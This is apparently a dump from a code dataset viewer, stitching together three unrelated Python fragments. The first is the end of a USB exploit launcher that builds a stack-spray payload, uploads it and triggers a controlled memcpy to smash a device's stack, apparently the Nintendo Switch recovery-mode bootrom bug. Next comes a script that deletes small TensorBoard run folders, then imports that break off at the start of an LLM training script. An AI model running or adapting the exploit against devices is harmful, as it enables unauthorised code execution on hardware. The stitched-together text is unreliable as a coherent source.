text stringlengths 0 93.6k |
|---|
# Fit a collection of the payload before the stack spray... |
padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR |
payload += target_payload[:padding_size] |
# ... insert the stack spray... |
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4) |
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count) |
# ... and follow the stack spray with the remainder of the payload. |
payload += target_payload[padding_size:] |
# Pad the payload to fill a USB request exactly, so we don't send a short |
# packet and break out of the RCM loop. |
payload_length = len(payload) |
padding_size = 0x1000 - (payload_length % 0x1000) |
payload += (b'\0' * padding_size) |
# Check to see if our payload packet will fit inside the RCM high buffer. |
# If it won't, error out. |
if len(payload) > length: |
size_over = len(payload) - length |
print("ERROR: Payload is too large to be submitted via RCM. ({} bytes larger than max).".format(size_over)) |
sys.exit(errno.EFBIG) |
# Send the constructed payload, which contains the command, the stack smashing |
# values, the Intermezzo relocation stub, and the final payload. |
print("Uploading payload...") |
switch.write(payload) |
# The RCM backend alternates between two different DMA buffers. Ensure we're |
# about to DMA into the higher one, so we have less to copy during our attack. |
switch.switch_to_highbuf() |
# Smash the device's stack, triggering the vulnerability. |
print("Smashing the stack...") |
try: |
switch.trigger_controlled_memcpy() |
except ValueError as e: |
print(str(e)) |
except IOError: |
print("The USB device stopped responding-- sure smells like we've smashed its stack. :)") |
print("Launch complete!") |
# <FILESEP> |
from argparse import ArgumentParser |
import shutil |
from tensorboard.backend.event_processing.event_file_inspector import get_inspection_units, print_dict, get_dict_to_print |
""" |
Deletes all folders with small tensorboard run files |
""" |
parser = ArgumentParser('delete small runs') |
parser.add_argument('--logdir', type=str, default='.') |
parser.add_argument('--delete_smaller_than', type=int) |
args = parser.parse_args() |
run_len = {} |
inspect_units = get_inspection_units(logdir=args.logdir) |
for run in inspect_units: |
path = run[0] |
max_length = 0 |
for key, value in get_dict_to_print(run.field_to_obs).items(): |
if value is not None: |
length = value['max_step'] |
if max_length < length: |
max_length = length |
run_len[path] = max_length |
for run, length in run_len.items(): |
if args.delete_smaller_than is None: |
print(f'run:{run} length:{length}') |
else: |
if length < args.delete_smaller_than: |
try: |
print(f'{run} is {length} and was deleted') |
shutil.rmtree(run) |
except: |
print(f"OS didn't let us delete {run}") |
# <FILESEP> |
import json |
import os |
import random |
import yaml |
import argparse |
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM |
from transformers import BloomConfig, BloomForCausalLM |
from transformers import LlamaForCausalLM, LlamaTokenizer, LlamaConfig |
import torch |
import deepspeed |
from datasets import * |
parser = argparse.ArgumentParser() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.